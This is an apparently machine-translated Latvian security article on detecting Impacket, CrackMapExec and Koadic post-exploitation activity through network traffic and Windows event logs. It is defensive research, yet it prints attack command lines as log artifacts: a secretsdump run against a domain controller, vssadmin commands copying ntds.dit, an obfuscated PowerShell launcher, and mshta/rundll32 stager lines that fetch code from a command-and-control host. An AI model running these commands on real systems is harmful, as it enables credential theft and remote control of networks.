Kā atklāt uzbrukumus Windows infrastruktūrai: hakeru rīku izpēte

Uzbrukumu skaits korporatīvajā sektorā katru gadu pieaug: piemēram 2017. gadā reģistrēts par 13% vairāk unikālu incidentu nekā 2016. gadā, un 2018. gada beigās - Par 27% vairāk incidentunekā iepriekšējā periodā. Ieskaitot tos, kur galvenais darba rīks ir Windows operētājsistēma. 2017.–2018. gadā APT Dragonfly, APT28, APT MuddyWater veica uzbrukumus valdībai un militārajām organizācijām Eiropā, Ziemeļamerikā un Saūda Arābijā. Un šim nolūkam mēs izmantojām trīs rīkus - Impact, CrackMapExec и Koadic. Viņu pirmkods ir atvērts un pieejams vietnē GitHub.

Ir vērts atzīmēt, ka šie rīki netiek izmantoti sākotnējai iespiešanai, bet gan uzbrukuma attīstīšanai infrastruktūrā. Uzbrucēji tos izmanto dažādos uzbrukuma posmos pēc iekļūšanas perimetrā. To, starp citu, ir grūti noteikt un bieži vien tikai ar tehnoloģiju palīdzību kompromisa pēdu identificēšana tīkla trafikā vai instrumenti, kas ļauj atklāt aktīvās uzbrucēja darbības pēc tam, kad viņš ir iekļuvis infrastruktūrā. Rīki nodrošina dažādas funkcijas, sākot no failu pārsūtīšanas līdz mijiedarbībai ar reģistru un komandu izpildi attālā datorā. Mēs veicām šo rīku izpēti, lai noteiktu to tīkla darbību.

Kas mums bija jādara:

• Izprotiet, kā darbojas uzlaušanas rīki. Uzziniet, kas uzbrucējiem ir jāizmanto un kādas tehnoloģijas viņi var izmantot.
• Atrodiet to, ko informācijas drošības rīki neatklāj uzbrukuma pirmajos posmos. Izlūkošanas fāzi var izlaist vai nu tāpēc, ka uzbrucējs ir iekšējs uzbrucējs, vai arī tāpēc, ka uzbrucējs izmanto infrastruktūras robu, kas iepriekš nebija zināms. Kļūst iespējams atjaunot visu viņa darbību ķēdi, līdz ar to arī vēlmi atklāt turpmāku kustību.
• Novērsiet viltus pozitīvus rezultātus no ielaušanās noteikšanas rīkiem. Mēs nedrīkstam aizmirst, ka tad, kad noteiktas darbības tiek konstatētas, pamatojoties tikai uz izlūkošanu, ir iespējamas biežas kļūdas. Parasti infrastruktūrā ir pietiekami daudz veidu, kas no pirmā acu uzmetiena nav atšķirami no likumīgiem, lai iegūtu jebkādu informāciju.

Ko šie rīki sniedz uzbrucējiem? Ja tas ir Impacket, tad uzbrucēji saņem lielu moduļu bibliotēku, ko var izmantot dažādos uzbrukuma posmos, kas seko pēc perimetra pārkāpšanas. Daudzi rīki iekšēji izmanto Impacket moduļus, piemēram, Metasploit. Tam ir dcomexec un wmiexec attālai komandu izpildei, secretsdump kontu iegūšanai no atmiņas, kas tiek pievienoti no Impacket. Rezultātā pareiza šādas bibliotēkas darbības noteikšana nodrošinās atvasinājumu noteikšanu.

Tā nav nejaušība, ka veidotāji par CrackMapExec (vai vienkārši CME) uzrakstīja “Powered by Impacket”. Turklāt CME ir gatava funkcionalitāte populāriem scenārijiem: Mimikatz paroļu vai to jaucējkodu iegūšanai, Meterpreter vai Empire aģenta ieviešana attālinātai izpildei un Bloodhound uz klāja.

Trešais rīks, ko izvēlējāmies, bija Koadic. Tas ir pavisam nesen, tas tika prezentēts starptautiskajā hakeru konferencē DEFCON 25 2017. gadā un atšķiras ar nestandarta pieeju: darbojas, izmantojot HTTP, Java Script un Microsoft Visual Basic Script (VBS). Šo pieeju sauc par dzīvošanu ārpus zemes: rīks izmanto sistēmā Windows iebūvētu atkarību un bibliotēku kopu. Radītāji to sauc par COM Command & Control vai C3.

IMPACKET

Impacket funkcionalitāte ir ļoti plaša, sākot no izlūkošanas AD iekšienē un datu vākšanas no iekšējiem MS SQL serveriem līdz akreditācijas datu iegūšanas paņēmieniem: tas ir SMB releja uzbrukums un faila ntds.dit iegūšana, kas satur lietotāju paroļu jaucējus no domēna kontrollera. Impacket arī izpilda komandas attālināti, izmantojot četras dažādas metodes: WMI, Windows Scheduler Management Service, DCOM un SMB, un, lai to izdarītu, ir nepieciešami akreditācijas dati.

Noslēpumu izgāztuve

Apskatīsim Secretsdump. Šis ir modulis, kas var mērķēt gan uz lietotāju mašīnām, gan domēna kontrolleriem. To var izmantot, lai iegūtu LSA, SAM, SECURITY, NTDS.dit atmiņas apgabalu kopijas, tāpēc to var redzēt dažādos uzbrukuma posmos. Pirmais solis moduļa darbībā ir autentifikācija, izmantojot SMB, kas prasa vai nu lietotāja paroli, vai tā jaucējkodu, lai automātiski veiktu Pass the Hash uzbrukumu. Tālāk nāk pieprasījums atvērt piekļuvi Service Control Manager (SCM) un piekļūt reģistram, izmantojot winreg protokolu, ar kura palīdzību uzbrucējs var uzzināt interesējošo filiāļu datus un iegūt rezultātus, izmantojot SMB.

Attēlā 1 mēs redzam, kā tieši, izmantojot winreg protokolu, piekļuve tiek iegūta, izmantojot reģistra atslēgu ar LSA. Lai to izdarītu, izmantojiet komandu DCERPC ar opkodu 15 - OpenKey.

Rīsi. 1. Reģistra atslēgas atvēršana, izmantojot winreg protokolu

Pēc tam, kad tiek iegūta piekļuve atslēgai, vērtības tiek saglabātas ar komandu SaveKey ar opkodu 20. Impacket to dara ļoti specifiskā veidā. Tas saglabā vērtības failā, kura nosaukums ir 8 nejaušu rakstzīmju virkne, kas pievienota .tmp. Turklāt šī faila tālāka augšupielāde notiek, izmantojot SMB no System32 direktorijas (2. att.).

Rīsi. 2. Shēma reģistra atslēgas iegūšanai no attālās mašīnas

Izrādās, ka šādu aktivitāti tīklā var noteikt pēc vaicājumiem noteiktām reģistra filiālēm, izmantojot winreg protokolu, konkrētus nosaukumus, komandas un to secību.

Šis modulis atstāj pēdas arī Windows notikumu žurnālā, padarot to viegli nosakāmu. Piemēram, komandas izpildes rezultātā

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 žurnālā mēs redzēsim šādu galveno notikumu secību:

1. 4624 - attālināta pieteikšanās.
2. 5145 - piekļuves tiesību pārbaude winreg attālajam pakalpojumam.
3. 5145 - failu piekļuves tiesību pārbaude System32 direktorijā. Failam ir iepriekš minētais nejaušais nosaukums.
4. 4688 — cmd.exe procesa izveide, kas palaiž vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - procesa izveide ar komandu:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - procesa izveide ar komandu:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - procesa izveide ar komandu:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Tāpat kā daudziem pēcekspluatācijas rīkiem, arī Impacket ir moduļi komandu attālinātai izpildei. Mēs koncentrēsimies uz smbexec, kas nodrošina interaktīvu komandu apvalku attālā datorā. Šim modulim ir nepieciešama arī autentifikācija, izmantojot SMB, vai nu ar paroli, vai paroles jaucējkodu. Attēlā 3. attēlā redzams piemērs, kā šāds rīks darbojas, šajā gadījumā tā ir vietējā administratora konsole.

Rīsi. 3. Interaktīva smbexec konsole

Pirmais smbexec solis pēc autentifikācijas ir SCM atvēršana ar OpenSCManagerW komandu (15). Vaicājums ir ievērojams: lauks MachineName ir DUMMY.

Rīsi. 4. Pieprasījums atvērt Service Control Manager

Pēc tam pakalpojums tiek izveidots, izmantojot komandu CreateServiceW (12). Smbexec gadījumā mēs katru reizi varam redzēt vienu un to pašu komandu uzbūves loģiku. Attēlā 5 zaļa norāda nemaināmus komandas parametrus, dzeltena norāda, ko uzbrucējs var mainīt. Ir viegli redzēt, ka izpildāmā faila nosaukumu, tā direktoriju un izvades failu var mainīt, bet pārējo ir daudz grūtāk mainīt, netraucējot Impacket moduļa loģiku.

Rīsi. 5. Pieprasīt pakalpojuma izveidi, izmantojot pakalpojumu kontroles pārvaldnieku

Smbexec arī atstāj acīmredzamas pēdas Windows notikumu žurnālā. Operētājsistēmas Windows Server 2016 žurnālā interaktīvās komandas apvalkam ar komandu ipconfig mēs redzēsim šādu atslēgu notikumu secību:

1. 4697 — pakalpojuma uzstādīšana cietušā mašīnā:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - cmd.exe procesa izveide ar argumentiem no 1. punkta.
3. 5145 - piekļuves tiesību pārbaude __izejas failam C$ direktorijā.
4. 4697 — pakalpojuma uzstādīšana cietušā mašīnā.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - cmd.exe procesa izveide ar argumentiem no 4. punkta.
6. 5145 - piekļuves tiesību pārbaude __izejas failam C$ direktorijā.

Impacet ir uzbrukuma rīku izstrādes pamats. Tas atbalsta gandrīz visus Windows infrastruktūras protokolus, un tajā pašā laikā tam ir savas raksturīgās iezīmes. Šeit ir norādīti konkrēti winreg pieprasījumi un SCM API izmantošana ar raksturīgu komandu veidošanu, faila nosaukuma formāts un SMB koplietošana SYSTEM32.

CRACKMAPEXEC

CME rīks galvenokārt ir paredzēts, lai automatizētu tās parastās darbības, kas uzbrucējam ir jāveic, lai pārvietotos tīklā. Tas ļauj strādāt kopā ar labi zināmo Empire aģentu un Meterpreter. Lai komandas izpildītu slēpti, CME var tās aizēnot. Izmantojot Bloodhound (atsevišķs izlūkošanas rīks), uzbrucējs var automatizēt aktīvās domēna administratora sesijas meklēšanu.

Bloodhound

Bloodhound kā atsevišķs rīks ļauj veikt uzlabotu izlūkošanu tīklā. Tas apkopo datus par lietotājiem, iekārtām, grupām, sesijām un tiek piegādāts kā PowerShell skripts vai binārs fails. Informācijas apkopošanai tiek izmantoti LDAP vai SMB protokoli. CME integrācijas modulis ļauj Bloodhound lejupielādēt upura mašīnā, palaist un saņemt savāktos datus pēc izpildes, tādējādi automatizējot darbības sistēmā un padarot tās mazāk pamanāmas. Bloodhound grafiskais apvalks apkopo savāktos datus grafiku veidā, kas ļauj atrast īsāko ceļu no uzbrucēja mašīnas līdz domēna administratoram.

Rīsi. 6. Bloodhound interfeiss

Lai palaistu upura mašīnā, modulis izveido uzdevumu, izmantojot ATSVC un SMB. ATSVC ir saskarne darbam ar Windows uzdevumu plānotāju. CME izmanto savu NetrJobAdd(1) funkciju, lai izveidotu uzdevumus tīklā. Piemērs tam, ko CME modulis nosūta, ir parādīts attēlā. 7: Šis ir cmd.exe komandas izsaukums un aptumšotais kods argumentu veidā XML formātā.

7. att. Uzdevuma izveide, izmantojot CME

Pēc uzdevuma iesniegšanas izpildei cietušā mašīna pati iedarbina Bloodhound, un tas ir redzams satiksmē. Moduli raksturo LDAP vaicājumi, lai iegūtu standarta grupas, visu iekārtu un lietotāju sarakstu domēnā un iegūtu informāciju par aktīvajām lietotāju sesijām, izmantojot SRVSVC NetSessEnum pieprasījumu.

Rīsi. 8. Aktīvo sesiju saraksta iegūšana, izmantojot SMB

Turklāt, palaižot Bloodhound upura mašīnā ar iespējotu auditēšanu, tiek parādīts notikums ar ID 4688 (procesa izveide) un procesa nosaukums. «C:WindowsSystem32cmd.exe». Ievērojami ir komandrindas argumenti:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Modulis enum_avproducts ir ļoti interesants no funkcionalitātes un ieviešanas viedokļa. WMI ļauj izmantot WQL vaicājumu valodu, lai izgūtu datus no dažādiem Windows objektiem, kas būtībā ir tas, ko izmanto šis CME modulis. Tas ģenerē vaicājumus AntiSpywareProduct un AntiМirusProduct klasēm par aizsardzības rīkiem, kas instalēti upura datorā. Lai iegūtu nepieciešamos datus, modulis pieslēdzas rootSecurityCenter2 nosaukumvietai, pēc tam ģenerē WQL vaicājumu un saņem atbildi. Attēlā 9. attēlā parādīts šādu pieprasījumu un atbilžu saturs. Mūsu piemērā tika atrasts Windows Defender.

Rīsi. 9. Moduļa enum_avproducts tīkla darbība

Bieži vien WMI auditēšana (Trace WMI-Activity), kuras pasākumos var atrast noderīgu informāciju par WQL vaicājumiem, var tikt atspējota. Bet, ja tas ir iespējots, tad, ja tiek palaists skripts enum_avproducts, tiks saglabāts notikums ar ID 11. Tas saturēs pieprasījumu nosūtījušā lietotāja vārdu un vārdu rootSecurityCenter2 nosaukumvietā.

Katram no CME moduļiem bija savi artefakti, neatkarīgi no tā, vai tie ir specifiski WQL vaicājumi vai noteikta veida uzdevuma izveide uzdevumu plānotājā ar obfuscēšanu un Bloodhound specifiskām darbībām LDAP un SMB.

KOADIC

Koadic atšķirīga iezīme ir sistēmā Windows iebūvēto JavaScript un VBScript tulku izmantošana. Šajā ziņā tas seko dzīves no zemes tendencei - tas ir, tam nav ārēju atkarību un tiek izmantoti standarta Windows rīki. Šis ir rīks pilnai Command & Control (CnC), jo pēc inficēšanās iekārtai tiek uzstādīts “implants”, kas ļauj to kontrolēt. Koadic terminoloģijā šādu mašīnu sauc par “zombiju”. Ja upura pusē nav pietiekamu privilēģiju pilnīgai darbībai, Koadic ir iespēja tās palielināt, izmantojot lietotāja konta kontroles apiešanas (UAC bypass) metodes.

Rīsi. 10. Koadic Shell

Cietušajam ir jāuzsāk saziņa ar Command & Control serveri. Lai to izdarītu, viņai jāsazinās ar iepriekš sagatavotu URI un jāsaņem galvenais Koadic korpuss, izmantojot vienu no skatuves. Attēlā 11. attēlā parādīts mshta stager piemērs.

Rīsi. 11. Sesijas inicializācija ar CnC serveri

Pamatojoties uz atbildes mainīgo WS, kļūst skaidrs, ka izpilde notiek, izmantojot WScript.Shell, un mainīgie STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE satur galveno informāciju par pašreizējās sesijas parametriem. Šis ir pirmais pieprasījuma un atbildes pāris HTTP savienojumā ar CnC serveri. Turpmākie pieprasījumi ir tieši saistīti ar izsaukto moduļu (implantu) funkcionalitāti. Visi Koadic moduļi darbojas tikai ar aktīvu sesiju ar CnC.

Mimikatz

Tāpat kā CME strādā ar Bloodhound, Koadic strādā ar Mimikatz kā atsevišķu programmu, un tam ir vairāki veidi, kā to palaist. Tālāk ir parādīts pieprasījuma un atbildes pāris Mimikatz implanta lejupielādei.

Rīsi. 12. Pārsūtiet Mimikatz uz Koadic

Varat redzēt, kā ir mainījies pieprasījuma URI formāts. Tagad tajā ir iekļauta vērtība csrf mainīgajam, kas ir atbildīgs par atlasīto moduli. Nepievērsiet uzmanību viņas vārdam; Mēs visi zinām, ka CSRF parasti saprot atšķirīgi. Atbilde bija tā pati Koadic galvenā daļa, kurai tika pievienots kods, kas saistīts ar Mimikatz. Tas ir diezgan liels, tāpēc apskatīsim galvenos punktus. Šeit mums ir Mimikatz bibliotēka, kas kodēta base64, serializēta .NET klase, kas to ievadīs, un argumenti Mimikatz palaišanai. Izpildes rezultāts tiek pārsūtīts tīklā skaidrā tekstā.

Rīsi. 13. Mimikatz palaišanas rezultāts attālā mašīnā

Exec_cmd

Koadic ir arī moduļi, kas var izpildīt komandas attālināti. Šeit mēs redzēsim to pašu URI ģenerēšanas metodi un pazīstamos sid un csrf mainīgos. Moduļa exec_cmd gadījumā pamattekstam tiek pievienots kods, kas spēj izpildīt čaulas komandas. Tālāk ir parādīts šāds kods, kas ietverts CnC servera HTTP atbildē.

Rīsi. 14. Implanta kods exec_cmd

Koda izpildei ir nepieciešams mainīgais GAWTUUGCFI ar pazīstamo WS atribūtu. Ar tās palīdzību implants izsauc apvalku, apstrādājot divus koda zarus - shell.exec ar izejas datu straumes atgriešanu un shell.run bez atgriešanās.

Koadic nav tipisks rīks, taču tam ir savi artefakti, pēc kuriem to var atrast likumīgā trafikā:

• īpaša HTTP pieprasījumu veidošana,
• izmantojot winHttpRequests API,
• izveidojot WScript.Shell objektu, izmantojot ActiveXObject,
• liels izpildāmais korpuss.

Sākotnējo savienojumu uzsāk stadijas programma, tāpēc ir iespējams noteikt tā darbību, izmantojot Windows notikumus. Mshta tas ir notikums 4688, kas norāda uz procesa izveidi ar sākuma atribūtu:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Kamēr Koadic darbojas, jūs varat redzēt citus 4688 notikumus ar atribūtiem, kas to lieliski raksturo:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Atzinumi

Noziedznieku vidū popularitāti iegūst tendence dzīvot no zemes. Viņi savām vajadzībām izmanto sistēmā Windows iebūvētos rīkus un mehānismus. Mēs redzam, ka populāri rīki Koadic, CrackMapExec un Impacket, ievērojot šo principu, arvien biežāk parādās APT pārskatos. Arī GitHub dakšu skaits šiem rīkiem pieaug, un parādās jauni (šobrīd tādu ir jau aptuveni tūkstotis). Šī tendence kļūst arvien populārāka tās vienkāršības dēļ: uzbrucējiem nav nepieciešami trešo pušu rīki, tie jau atrodas upuru iekārtās un palīdz viņiem apiet drošības pasākumus. Mēs koncentrējamies uz tīkla komunikācijas izpēti: katrs iepriekš aprakstītais rīks atstāj savas pēdas tīkla trafikā; detalizēta to izpēte ļāva mums mācīt mūsu produktu PT tīkla uzbrukuma atklāšana atklāt tos, kas galu galā palīdz izmeklēt visu ar viņiem saistīto kiberincidentu ķēdi.

Autori:

• Antons Tyurins, PT ekspertu drošības centra pozitīvo tehnoloģiju ekspertu pakalpojumu nodaļas vadītājs
• Egors Podmokovs, PT ekspertu drošības centra pozitīvo tehnoloģiju eksperts

Avots: www.habr.com